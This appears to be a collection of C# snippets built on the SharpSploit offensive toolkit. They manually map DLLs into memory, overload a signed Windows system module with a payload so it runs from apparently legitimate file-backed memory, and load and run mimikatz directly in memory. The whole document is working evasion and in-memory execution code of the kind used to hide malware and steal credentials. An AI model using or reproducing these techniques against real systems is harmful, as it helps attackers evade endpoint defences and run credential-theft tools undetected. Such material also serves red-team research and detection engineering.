static void Main(string[] args)
{
int curPid = Process.GetCurrentProcess().Id;
string path = @"C:\path\to\injector.dll";
byte[] bytes = System.IO.File.ReadAllBytes(path);
Console.WriteLine($"Size of DLL: {bytes.Length} \n");
Console.WriteLine("[+] Mapping Test DLL from byte array and calling export! \n");
SharpSploit.Execution.PE.PE_MANUAL_MAP mapping = SharpSploit.Execution.ManualMap.Map.MapModuleToMemory(bytes);
Console.WriteLine("[>] Manually mapped DLL ModuleBase : 0x" + string.Format("{0:X}", mapping.ModuleBase.ToInt64()) + "\n");
object[] FunctionArgs = { curPid };
SharpSploit.Execution.DynamicInvoke.Generic.CallMappedDLLModuleExport(mapping.PEINFO, mapping.ModuleBase, "inject", typeof(inject), FunctionArgs);
Console.WriteLine("Inject proc has been called!\n");
Console.ReadLine();
}
/// <summary>
/// Load a signed decoy module into memory creating legitimate file-backed memory sections within the process. Afterwards overload that
/// module by manually mapping a payload in it's place causing the payload to execute from what appears to be file-backed memory.
/// </summary>
/// <author>The Wover (@TheRealWover), Ruben Boonen (@FuzzySec)</author>
/// <param name="Payload">Full byte array for the payload module.</param>
/// <param name="DecoyModulePath">Optional, full path the decoy module to overload in memory.</param>
/// <returns>PE.PE_MANUAL_MAP</returns>
public static PE.PE_MANUAL_MAP OverloadModule(byte[] Payload, string DecoyModulePath = null)
{
// Verify process & architecture
bool isWOW64 = DynamicInvoke.Native.NtQueryInformationProcessWow64Information((IntPtr)(-1));
if (IntPtr.Size == 4 && isWOW64)
{
throw new InvalidOperationException("Module overloading in WOW64 is not supported.");
}
// Did we get a DecoyModule?
if (!string.IsNullOrEmpty(DecoyModulePath))
{
if (!File.Exists(DecoyModulePath))
{
throw new InvalidOperationException("Decoy filepath not found.");
}
byte[] DecoyFileBytes = File.ReadAllBytes(DecoyModulePath);
if (DecoyFileBytes.Length < Payload.Length)
{
throw new InvalidOperationException("Decoy module is too small to host the payload.");
}
}
else
{
DecoyModulePath = FindDecoyModule(Payload.Length);
if (string.IsNullOrEmpty(DecoyModulePath))
{
throw new InvalidOperationException("Failed to find suitable decoy module.");
}
}
// Map decoy from disk
Execute.PE.PE_MANUAL_MAP DecoyMetaData = Map.MapModuleFromDisk(DecoyModulePath);
IntPtr RegionSize = DecoyMetaData.PEINFO.Is32Bit ? (IntPtr)DecoyMetaData.PEINFO.OptHeader32.SizeOfImage : (IntPtr)DecoyMetaData.PEINFO.OptHeader64.SizeOfImage;
// Change permissions to RW
DynamicInvoke.Native.NtProtectVirtualMemory((IntPtr)(-1), ref DecoyMetaData.ModuleBase, ref RegionSize, Execute.Win32.WinNT.PAGE_READWRITE);
// Zero out memory
DynamicInvoke.Native.RtlZeroMemory(DecoyMetaData.ModuleBase, (int)RegionSize);
// Overload module in memory
PE.PE_MANUAL_MAP OverloadedModuleMetaData = Map.MapModuleToMemory(Payload, DecoyMetaData.ModuleBase);
OverloadedModuleMetaData.DecoyModule = DecoyModulePath;
return(OverloadedModuleMetaData);
}
static void Main(string[] args)
{
// Details
String testDetail = @"
#=================>
# Hello there!
# I load a signed module into memory, I
# then manually map a payload DLL over
# that module and call one of it's
# exports.
#=================>
";
Console.WriteLine(testDetail);
// Manually stomp module in memory
// |-> byte[] overload is also available for in-line loading
String Payload = @"C:\Users\b33f\Tools\Dll-Template\DLL-Template\x64\Release\Dll-Template.dll";
SharpSploit.Execution.PE.PE_MANUAL_MAP OverloadMeta = SharpSploit.Execution.DynamicInvoke.Generic.OverloadModule(Payload, @"C:\WINDOWS\System32\Windows.Storage.ApplicationData.dll");
Console.WriteLine("[?] Decoy module : " + OverloadMeta.DecoyModule);
Console.WriteLine("[+] Overloading at : " + String.Format("{0:X}", (OverloadMeta.ModuleBase).ToInt64()));
if (OverloadMeta.PEINFO.Is32Bit)
{
Console.WriteLine("[+] Mapped module is : x86");
}
else
{
Console.WriteLine("[+] Mapped module is : x64");
}
// Call the executable by it's entry point
Console.WriteLine("\n[*] Calling mapped module by export..\n");
object[] FunctionArgs = { };
SharpSploit.Execution.DynamicInvoke.Generic.CallMappedDLLModuleExport(OverloadMeta.PEINFO, OverloadMeta.ModuleBase, "test", typeof(TestFunc), FunctionArgs);
// Keep the main thread running..
while (true)
{
System.Threading.Thread.Sleep(2000);
}
}
static void Main(string[] args)
{
// Details
String testDetail = @"
#=================>
# Hello there!
# I manually map a PE into memory &
# start a thread at the AddressOfEntryPoint
#=================>
";
Console.WriteLine(testDetail);
// Manually map PE into memory
// |-> byte[] overload is also available for in-line loading
SharpSploit.Execution.PE.PE_MANUAL_MAP ManMap = SharpSploit.Execution.DynamicInvoke.Generic.MapModuleToMemory(@"C:\Users\b33f\Tools\Mimikatz\x64\mimikatz.exe");
Console.WriteLine("[?] PE mapped at : " + String.Format("{0:X}", (ManMap.ModuleBase).ToInt64()));
if (ManMap.PEINFO.Is32Bit)
{
Console.WriteLine("[+] Mapped module is : x86");
}
else
{
Console.WriteLine("[+] Mapped module is : x64");
}
// Call the executable by it's entry point
Console.WriteLine("\n[*] Calling mapped module by it's EP..\n");
SharpSploit.Execution.DynamicInvoke.Generic.CallMappedPEModule(ManMap.PEINFO, ManMap.ModuleBase);
// Keep the main thread running..
while (true)
{
System.Threading.Thread.Sleep(2000);
}
}
